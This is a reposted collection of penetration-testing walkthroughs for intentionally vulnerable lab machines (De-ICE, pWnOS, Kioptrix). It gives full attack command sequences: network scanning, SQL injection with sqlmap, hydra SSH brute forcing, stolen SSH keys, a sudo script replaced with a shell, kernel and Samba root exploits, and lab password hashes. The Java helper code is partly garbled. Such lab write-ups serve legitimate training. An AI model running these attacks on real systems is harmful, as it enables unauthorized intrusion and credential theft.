root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0: 99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0 :99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you!

HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

What is this?

This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
Dictionary(s)

Software
Name: De-ICE.net
Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso
http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar
http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.2.1-255

nmap -n -sV -sS -O 192.168.2.100

nmap -n -sV -sS -O 192.168.2.101

firefox 192.168.2.100

[+]kate -> list of possible usernames. Save. Filename: usernames.txt

firefox 192.168.2.101

[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80



firefox http://192.168.2.101/~pirrip

[+]kate -> Update usernames with the ones which we got a respond from. Save.

[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2

./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124

firefox http://192.168.2.101/~pirrip/.ssh

// Save both files

mv /root/id_rsa /http://root/.ssh/id_rsa

mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub

chmod 000 /http://root/.ssh/id_rsa

chmod 000 /http://root/.ssh/id_rsa.pub

ssh pirrip@192.168.2.100
// Yes

mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'

cd /etc/

vi passwd

// kate -> Update usernames with only valid ones.

vi group

sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st

su
// Password: 0l1v3rTw1st

cd /root/

ls -a

cd .save/

ls -a

chmod -R 777 /root/

//In BackTrack//

scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/

unzip great_expectations.zip

tar xf great_expectations.tar

strings Jan08

//In SSH//
sudo iv /var/mail/havisham

modprobe capability

//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //

ls -a

//In SSH//

exit


//In BackTrack//

[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.

Sunday, September 11, 2011

HOWTO : pWnOS

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

What is this?

This is my walk though of how I broke into pWnOS v1.

pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points

Scenario

A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.

It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t.

What do I need?

BackTrack 4 (Final)
pWnOS.vmdk
exploit-db.com or milw0rm.

Software
Name: pWnOS
Version: 1
Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip

Download Link:

http://www.mediafire.com/file/ec3hmlzuyzy/pWnOS v1.0.part1.rar
http://www.mediafire.com/file/yngwzqkxmin/pWnOS v1.0.part2.rar
http://www.mediafire.com/file/htmqm3dzgya/pWnOS v1.0.part3.rar

http://www.0dayclub.com/public/index...nOS%20v1.0.zip
http://krash.in/bond00/new/pWnOS%20v1.0.zip
http://0dayclub.com/files/pWnOS%20v1.0.zip

Forum/Support: http://forums.heorot.net/viewforum.php?f=21

Commands

nmap 192.168.3.1-255

nmap -sV -sS -O 192.168.3.100

firefox http://192.168.3.100

firefox http://192.168.3.100:10000


firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow

firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)

wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys

tar jxvf debian_ssh_rsa_2048_x86.tar.bz

cd rsa/2048

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*

ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit

ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a

firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)

nano vmsplice.c

gcc vmsplice.c -o vmsplice

./vmsplice

whoami

----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!

This is one method of getting in, the author did say that there is multiple ways in!

It took me a bit of work to also to get it to work with virtual box & static IP addresses.

That's all! See you.

HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version a", and should be not confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup.

Heorot.net release's (in date order):

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated running services running open ports (nmap)
Discovered a SQL Injection (Firefox)
Dump all usernames & passwords to the database (sqlmap)
Tested for any repeated logins with known usernames & working passwords (hydra)
Escalated privilege by incorrectly configured settings (sudo)

What do I need?

de-ice-1.120-1.0a.iso (MD5: E8FB66760ADDF85896DB3F78F278F7D2)
Spare or a Virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5 repository).
sqlmap – (Can be found on BackTrack 5).
hydra – (Can be found on BackTrack 5).

Walkthrough

A quick "ping" scan with nmap, shows which hosts are connected to the network. Once the target had been discovered a detailed port scan (TCP & UDP) was taken by using unicornscan. To check the results another detailed TCP port scan was done, though this time it was done using nmap. Unicornscan uses a lot less time to do a port scan compared to nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by "information gathering". The attacker uses the "-a" option, which allows for "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details" as well as increasing the scan speed by "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.

The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows for the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code allowed with it.

The attacker uses sqlmap to speed up the injection process as it is designed to test multiple injection methods. sqlmap has pre-built commands which allows the attacker to find common sensitive information (such as; the running services and versions, current user and the database admin, user privileges as well as viewing every table along with the contents). The attacker chooses to capture all the users and their passwords to the database services. The passwords used in the database are encrypted, however, they use a well-known scheme which is easily cracked. The result of this, gives the attacker 50 working usernames as well as 49 known passwords too.

The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else known password, any blank passwords or their usernames as the passwords), by brute forcing the SSH remote login. The result of this action, gives the attacker remote access to the system with 50 credentials.

On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file-they have been. The attacker then backups the file and replaces it with their own file - which is a shell prompt.

The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).

As the attacker now has access to the complete system, they access every user folder at once and view random files at their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them out for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).

Game over

Commands

ifconfig eth0
ifconfig eth0 192.168.1.59
ifconfig eth0
nmap 192.168.1.* -n -sn -sP
us -H -msf -Iv 192.168.1.120 -p 1-65535 && us -H -mU -Iv 192.168.1.120 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.13.120
firefox 192.168.1.120 # Add new product -> view product
cd /pentest/database/sqlmap
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" -f -b --current-user --is-dba --is-dba --privileges --dbs --dump
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" --users --passwords
cd output/192.168.1.120/
ll
grep -i administrator log
grep -i localhost log | grep -v : | sort | uniq
grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed "s/'@'localhost'//" > /tmp/users
grep "clear-text" log | sort | uniq
grep "clear-text" log | sort | uniq | sed "s/ clear-text password: //" > /tmp/passwords
wc -l /tmp/users
hydra -L /tmp/users -P /tmp/passwords -e ns 192.168.1.120 ssh 2>/dev/null | tee /tmp/output
#medusa -h 192.168.1.120 -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh
ssh ccoffee@192.168.1.120
ls
cd scripts
ls -lah
sudo -l
cat getlogs.sh
mv getlogs.sh getlogs.bkup
echo "/bin/sh" > getlogs.sh
cat getlogs.sh
chmod +x getlogs.sh
ls -l
./getlogs.sh
id
exit
sudo getlogs.sh
sudo /home/ccoffee/scripts/getlogs.sh
id
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/
ls -lAhR /home
#cat /home/aallen/gravy.txt
cat /home/aspears/hbkae
cat /home/bbanter/notes
cat /home/cchisholm/reminders.text
cat /home/ccoffee/DONOTFORGET
#cat /home/hlovell/creepy.doc
cat /home/jalvarez/draft
cat /home/jdavenport/company_address.txt
#cat /home/jdavenport/svrc.txt
cat /home/jduff/todo.txt
#cat /home/krenfro/list
cat /home/ktso/personnel.doc
#cat /home/kwebber/list
#cat /home/lmartinez/favorite.txt
#cat /home/mnader/layout
cat /home/rpatel/schedule


Notes

- De-ICE.net v1.2a has a static IP address of 192.168.1.120. Make sure you are on the same subnet as it!
- When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
- Each time you start De-ICE.net v1.2a it will generate fresh SSH keys - so it's different each time!
- I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

That's all! See you.

HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

The "vulnerable-by-design" series De-ICE, has released another challenge. However, it's in two different parts - which makes the naming more confusing! This is De-ICE level 1-disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge. The students of "HackingDojo" produced their own exploitable LiveCD which was released under the de-ice name. This is it. To date all of Heorot.net releases (in date order) are as follows:

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated running services running open ports (nmap)
Enumerated possible username(s) (Netcat)
Brute forced login details (Hydra)
Profiled other users (CUPP)
Escalated privilege by re-creating custom encryption program (Java)
Found the "flag" (a database file)

What do I need?

de-ice-1.120-1.0b.iso (MD5: 5AFEA4D036681093408AE493D4BD2672)
Spare or a Virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5's repository).
hydra – (Can be found on BackTrack 5).
Common User Passwords Profiler – (Can be found on BackTrack 5).
Java compiler – (Can be found on BackTrack 5).

Walkthrough

By doing a quick "ping" scan with nmap, it reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan as well as enumerating which services are running by using nmap. Unicornscan is quicker doing a port scan (especially with UDP scanning). However, nmap has the upside of it being able to do more by "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using "-a" option). The attacker also increases the scan speed (by "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).

The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that it the web site is "under maintenance", with methods of contact - a telephone number and email address.

The port scan revealed that there was a SMTP service running and decided to attempt to use the email address to identity possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name it will return if the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find its valid login, csadmin.

The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password. however it would of taken a lot longer for it to reach it). The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker found the valid password, 'rocker'.

Upon logging into the system remotely, the attacker finds if there are any other valid users in the system (the result is 4). The attacker then continues on by browsing the users (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user - which is also commonly used as their password.

After building up the profile for each user, the attacker then generates possible passwords using this information, by using CUPP (Common User Passwords Profiler). The attacker enters in the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the user (sdadmin) password (his child's name and year of birth - donovin1998).

The attacker logs in with the new credentials and views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feeling towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (nickname and a few numbers at the end-databaser60).

When the attacker logs in once again, they soon find the first part to an email which has been in every user account so far. Then contents of the email has been "corrupted", however, the header file of the message is still in contact. The subject of the message implies the purpose of it, "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which shows the beginning of the possible source code.

The attacker then builds up the code, from the three found parts so far, which has been written in java and the function of it was the generation function for the new passwords policy. There are comments left in the code, saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds the code (input & conversion functions).

Once the program was complete, the attacker runs it to generate the passwords for sysadmin and the root account. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.

The attacker now has access to the complete system...

Game over

...and choose to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file, and by trying all the encryption algorithms with the super user's password, they were able to decrypt the file and view the content in plain text - revealing customers' details, such as names, email addresses, usernames, passwords and more!

Game over...again

Commands

ifconfig eth0
ifconfig eth0 192.168.1.192
ifconfig eth0
nmap 192.168.1.* -n -sn -sP
us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.20
firefox 192.168.1.20 # customerserviceadmin@nosecbank.com
nc -v 192.168.1.20 25
HELO attacker
VRFY customerserviceadmin
mail from: attacker@slax.example.net
rcpt to: customerserviceadmin
rcpt to: csadmin
quit
wc -l /pentest/passwords/wordlists/darkc0de.lst
find / -name password.lst
wc -l /opt/framework3/msf3/data/john/wordlists/password.lst
hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output
ssh csadmin@192.168.1.20 # rocker
id
cat /etc/passwd # sysadmin, dbadmin, sdadmin, csadmin
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)
exit
cd /pentest/passwords/cupp/
python cupp.py -i # Paul, Donovin, 22121998, nosecbank
hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
ssh sdadmin@192.168.1.20 # donovin1998
id
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less # dbadmin (Fred, databaser)
exit
python cupp.py -i # Fred, databaser, nosecbank
hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
ssh dbadmin@192.168.1.20 # databaser60
id
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less # sysadmin, New Custom Encryption for Passwords
umask 002
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' > /tmp/output
su csadmin # rocker
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output
su sdadmin # donovin1998
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output
cat /tmp/output | sort -g
cat /tmp/output | sort -g | cut -f2-
exit
exit
exit
geany deice.java
less deice.java
javac deice.java
java deice # sysadmin - 531/{{tor/rv/A
java deice # root - 31/Fwxw+2
ssh sysadmin@192.168.1.20 # 7531/{{tor/rv/A
id
su - # 31/Fwxw+2
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
pwd
exit
pwd
ls
cat Note_to_self
ls -lAhR /home
cd /home/ftp/incoming/
ls -l
openssl -h
openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"
su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"' # 31/Fwxw+2
ls -l
cat useracc_update.csv


deice.java

import java.io.*;
//import java.util.Arrays;

public class deice
{
public static void main(String[] args)
{
try
{
System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");

BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
System.out.print("[?] Username: ");
String input=in.readLine();

int[] output=processLoop(input);
//System.out.println("[+] Output: "+Arrays.toString(output));

String outputASCII="";
for(int i=0;i] Password: "+outputASCII);

}
catch(IOException e)
{
System.out.println("[-] IO Error!");
}
}

/*input is username of account*/
public static int[] processLoop(String input){
int strL=input.length();
int lChar=(int)input.charAt(strL-1);
int fChar=(int)input.charAt(0);
int[] encArr=new int[strL+2];
encArr[0]=(int)lChar;

for(int i=1;i<strL+1;i++) encArr[i]=(int)input.charAt(i-1);

encArr[encArr.length-1]=(int)fChar;
encArr=backLoop(encArr);
encArr=loopBack(encArr);
encArr=loopProcess(encArr);
int j=encArr.length-1;

for(int i=0;i<encArr.length;i++){
if(i==j) break;
int t=encArr[i];
encArr[i]=encArr[j];
encArr[j]=t;
j--;
}
return encArr;
}

/*Note the pseudocode will be implemented with the
root account and my account, we still need to implement it with the csadmin, sdadmin,
and dbadmin accounts though*/
public static int[] backLoop(int[] input){
int ref=input.length;
int a=input[1];
int b=input[ref-1];
int ch=(a+b)/2;

for(int i=0;i<ref;i++){
if(i%2==0) input[i]=(input[i]%ch)+(ref+i);
else input[i]=(input[i]+ref+i);
}
return input;
}

public static int[] loopBack(int[] input){
int ref=input.length/2;
int[] encNew=new int[input.length+ref];
int ch=0;

for(int i=(ref/2);i<input.length;i++){
encNew[i]=input[ch];
ch++;
}

for(int i=0;i<encNew.length;i++){
if(encNew[i]<=33) encNew[i]=33+(++ref*2); else if(encNew[i]>=126) encNew[i]=126-(--ref*2);
else{
if(i%2==0) encNew[i]-=(i%3);
else encNew[i]+=(i%2);
}
}
return encNew;
}

public static int[] loopProcess(int[] input){
for(int i=0;i<input.length;i++){
if(input[i]==40||input[i]==41) input[i]+=input.length;
else if(input[i]==45) input[i]+=20+i;
}
return input;
}
}


Notes

- De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!
- The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.
- I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!

That's all! See you.

HOWTO : Kioptrix - Level 1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness method which is a quick attack and straight to root.

Method

Scan network for hosts (nmap)
Scan target for running services (nmap)
Detect network shares (smbclient)
Exploit samba weakness, Trans2open (Metasploit)
Game Over

What do I need?

Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD58DB6CE65652880327B92150B08106EA)
VMware player OR workstation. Download here
nmap – (Can be found on BackTrack 4-R2). Download here
smbclient – (Can be found on BackTrack 4-R2). Download here
metasploit – (Can be found on BackTrack 4-R2). Download here

Walkthrough

A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this are:

* OS: Linux v2.4.x (2.4.9-18)
* Samba: Samba smbd (wordgroup: MYGROUP)

The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:

* Anonymous login
* Hostname (KIOPTRIX)
* Workgroup (MYGROUP)
* Defautl hidden admin shares (IPC$, ADMIN$)

The attacker proceeds begins by starting up metasploit and searching for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.

Commands

start-network
dhclient eth0
clear

nmap 192.168.0.* -n -sn -sP
nmap 192.168.0.111 -T4 -O -sV -sS #-sC -A -p- -v

#nmblookup -A 192.168.0.111 # Hostname
smbclient -L \\192.168.0.111 -N # What services are available on a server
clear

msfconsole
search samba
use linux/samba/trans2open
#info
show options
set RHOST 192.168.0.111
show options
exploit
#msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E #PAYLOAD=linux/x86/shell_bind_tcp

id
uname -a
cat /etc/shadow
cat /etc/issue


That's all! See you.

HOWTO : Kioptrix - Level 1.1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

Time for level 2! Like before, kioptrix is another “Vulnerable-By-Design OS” (De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible.

This video demonstrates how code being injected into a web page results in the machine becoming compromised. The attacker afterwards then starts exploring the system for further pieces of information.

Method

Scan network for hosts (Nmap)
Bypass login screen (MySQL Injection)
Local command execution (PHP Injection)
Upload a backdoor (PHP Meterpreter)
Gain root access (ip_append_data() local ring0 root exploit)
Game Over
Enable access to MySQL database (MySQL Injection)
Gather information (history and user credentials)

What do I need?

Kioptrix - Level 2 VM. Download here (Mirror: Part 1 MD5:CF25057866E4BEA4F05651ACC222E3AE, Part 2 MD5:1ADCE0A6AFE4EE2FADD82F9EE3878AED, Part 3 MD5:A8012648FAB73746CE4E3250E0D66291)
VMware player OR workstation. Download here
Nmap – (Can be found on BackTrack 4-R2). Download here
Metasploit – (Can be found on BackTrack 4-R2)
Internet Browser – (Firefox can be found on BackTrack 4-R2)
A Text Editor – (Kate can be found on BackTrack 4-R2)
ip_append_data() ring0 Root Exploit – (Can be found on exploit-db.com)
MySQL – (Can be found on BackTrack 4-R2)

Walk through *Due to the forums security, I'm unable to post the complete walk through*

